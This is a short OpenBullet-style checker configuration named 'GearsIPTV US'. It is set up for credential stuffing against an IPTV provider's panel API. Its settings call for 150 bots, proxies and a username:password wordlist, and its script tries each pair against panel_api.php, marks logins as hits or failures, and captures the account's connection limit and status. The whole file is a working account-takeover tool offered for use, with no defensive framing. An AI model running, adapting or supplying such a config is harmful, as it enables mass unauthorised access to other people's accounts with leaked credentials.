[SETTINGS]
{
  "Name": "GearsIPTV US",
  "SuggestedBots": 150,
  "LastModified": "2018-05-14T14:21:05.0426827+00:00",
  "AdditionalInfo": "",
  "Author": "Chaos",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "http://gorilladick4.us:2086/panel_api.php?username=<USER>&password=<PASS>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G955N Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "{\"username\":\"" 
  KEYCHAIN Failure OR 
    KEY "\":{\"auth\":0}}" 
#Max_Connections PARSE "<SOURCE>" LR "ions\":\"" "\"" Recursive=FALSE -> CAP "Max Connections" "" "" 
#Status PARSE "<SOURCE>" LR "s\":\"" "\"" Recursive=FALSE -> CAP "Status" "" "" 
